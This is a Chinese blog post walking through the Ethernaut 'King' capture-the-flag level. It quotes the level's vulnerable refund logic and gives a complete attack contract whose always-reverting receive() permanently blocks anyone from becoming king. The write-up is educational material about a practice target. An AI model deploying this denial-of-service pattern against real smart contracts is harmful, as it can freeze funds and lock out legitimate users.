# 智能合约黑客攻击 Ethernaut:    9. King

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-26
**URL:** https://paragraph.com/@leekdev/ethernaut-9-king

## Content

Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目想办法成为King合约里的owner，还要阻止其他人成为King。Hack思路关键在 receive 方法里的逻辑 receive() external payable { // 必须要转一笔钱，比现在的 king 转的钱多 require(msg.value >= prize || msg.sender == owner); // 如果其他人转的钱比当前 king 转的多，就会把当前 king 的钱退回去，设置新king // 由于需要退 ether ，可以在退钱的 receive 方法里拦截 payable(king).transfer(msg.value); king = msg.sender; prize = msg.value; } 攻击合约contract KingHack { constructor(address _target) payable { (bool success,) = payable(address(_target)).call{ value: msg.value }(""); require(success, "External call failed"); } receive() external payable { require(false, "I am King forever!"); } } Hack案例防范思路….参考资料….

## Publication Information

- [Leek DEV](https://paragraph.com/@leekdev/): Publication homepage
- [All Posts](https://paragraph.com/@leekdev/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@leekdev): Subscribe to updates
- [Twitter](https://twitter.com/LeekDEV): Follow on Twitter